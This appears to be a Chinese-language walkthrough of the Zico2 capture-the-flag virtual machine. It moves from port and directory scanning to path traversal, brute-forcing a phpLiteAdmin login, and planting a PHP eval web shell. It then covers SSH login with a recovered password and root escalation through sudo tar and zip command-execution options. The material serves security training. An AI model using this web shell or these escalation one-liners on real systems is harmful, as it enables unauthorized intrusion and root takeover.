zico2-1

信息收集

1
2
3
arp-scan -l          nmap --min-rate 100000 -p- 192.168.240.135     nmap --min-rate 100000 -p80,22,111,54453 -A 192.168.240.135

dirsearch -u 192.168.240.135   dirb  http://192.168.240.135/      nikto -host 192.168.240.135 -p 80
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40322/udp6  status
|   100024  1          48314/udp   status
|   100024  1          50709/tcp6  status
|_  100024  1          54453/tcp   status
54453/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:BC:84:19 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.240.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds

渗透测试

1
2
3
4
进入80端口,一直点点点,http://192.168.240.135/view.php?page=tools.html
发现这个page有目录穿越漏洞,但是现在还不知道绝对路径是什么
尝试了几次找到了http://192.168.240.135/view.php?page=../../../../../../var/www/tools.html
这个在实战能交一个中危

image-20241208135640370

1
2
3
dirb扫到了这个目录---- Entering directory: http://192.168.240.135/dbadmin/ ---
http://192.168.240.135/dbadmin/test_db.php这是sqlite的网页版,也没有验证码直接爆破拿到密码是admin
这个数据库有远程执行漏洞,大概就是说上传一个反弹webshell就ok了

image-20241208140558214

image-20241208140737953

1
<?php @eval($_POST["cmd"]);?>

image-20241208172436157image-20241208172514138image-20241208172652595image-20241208172713636image-20241208172749045

1
2
3
改一下名字就能在http://192.168.240.135/dbadmin/这里看到了
用蚁剑连webshell http://192.168.240.135/dbadmin/test.php  
插件直接把shell给到msf

image-20241208175857552

提权

image-20241208180243541

1
2
3
先找config文件,找到了一个账号一个用户名
ssh zico@192.168.240.135 sWfCsfJSPV9H3AmQzw8 登录即可
sudo -l 发现tar和zip有root权限,真奇怪,谁一般给压缩命令root权限

image-20241208190147508

1
2
3
4
5
6
通过tar提权:
echo "/bin/bash" > shell.sh
sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh
通过zip提权
touch 1.txt
sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"